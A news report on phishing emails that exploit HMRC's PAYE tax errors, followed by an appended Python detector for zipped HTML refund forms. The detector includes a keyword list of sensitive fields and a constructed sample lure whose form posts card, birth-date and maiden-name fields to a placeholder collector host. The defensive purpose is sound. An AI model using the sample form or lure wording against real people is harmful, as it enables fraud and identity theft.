Phishers exploiting HMRC tax error refund



The IT security company Sophos has warned computer users to be wary of a spam email campaign that exploits the widely reported HMRC tax errors.

Nearly ten million people have been affected by HMRC’s error, which occurred as the result of a new automated computer platform introduced to update the PAYE (Pay As You Earn) tax system. HMRC is currently in the process of contacting the people affected, though the body has long confirmed on its website that it would “never send notifications of a tax rebate by email, or ask you to disclose personal or payment information by email”.
 
Sophos has intercepted emails that claim to come from HMRC with the subject line "You Have An HMRC Refund", informing recipients that they have made overpayments. The email goes on to say that an attached form must be completed before a refund can be processed. Attached to the email is a file called 'Refund-Form.zip', which contains an HTML file called 'Refund-Form.htm' that asks for information including credit card details, full date of birth, and mother's maiden name.
 
"If you do make the mistake of filling in the form, your confidential data is uploaded to a Chinese server.  You're not going to receive a windfall because of this form - you've just been phished," said Graham Cluley, senior technology consultant at Sophos.  
 
Cluley went on to reiterate HMRC’s warning that it would never inform people of a tax rebate via email or invite them to complete an online form to receive a rebate of tax: “You have been warned - don't let your eagerness for a tax refund lead you to throw caution to the wind.”
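
A mail-gateway style check for the kind of message described in this report, as an added example that is not part of the original article or of Sophos's tooling: it opens zip attachments and flags any HTML file whose form posts to a remote host and asks for sensitive fields. The keyword list, the `collector.example` host and the sample field names are constructed assumptions.

```python
import io
import zipfile
from email import message_from_bytes
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

SENSITIVE = ("card", "cvv", "birth", "maiden")  # assumed keyword list, tune locally
class FormScan(HTMLParser):  # collects remote form targets and sensitive-looking field names
    def __init__(self):
        super().__init__()
        self.hosts, self.fields = set(), set()
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        host = urlparse(a.get("action") or "").hostname  # None for relative actions
        if tag == "form" and host:
            self.hosts.add(host)
        name = (a.get("name") or "").lower()
        if tag in ("input", "select", "textarea") and any(k in name for k in SENSITIVE):
            self.fields.add(name)

def scan_message(raw):
    """Yield (attachment, member, hosts, fields) for each risky HTML form inside a zip."""
    for part in message_from_bytes(raw).walk():
        fname = part.get_filename() or ""
        if not fname.lower().endswith(".zip"):
            continue
        try:
            zf = zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True) or b""))
        except zipfile.BadZipFile:
            continue  # mislabelled or corrupt archive
        for member in zf.namelist():
            if member.lower().endswith((".htm", ".html")):
                scan = FormScan()
                scan.feed(zf.read(member).decode("utf-8", "replace"))
                if scan.hosts and scan.fields:
                    yield (fname, member, sorted(scan.hosts), sorted(scan.fields))

def build_sample():  # constructed message shaped like the report; host and fields are placeholders
    html = ('<form action="http://collector.example/submit"><input name="card_number">'
            '<input name="date_of_birth"><input name="mothers_maiden_name"></form>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Refund-Form.htm", html)
    msg = EmailMessage()
    msg["Subject"] = "You Have An HMRC Refund"
    msg.set_content("Please complete the attached form.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="Refund-Form.zip")
    return msg.as_bytes()
```

Calling `list(scan_message(build_sample()))` returns one finding that names the archive, the HTML member, the remote host the form posts to and the sensitive fields it requests.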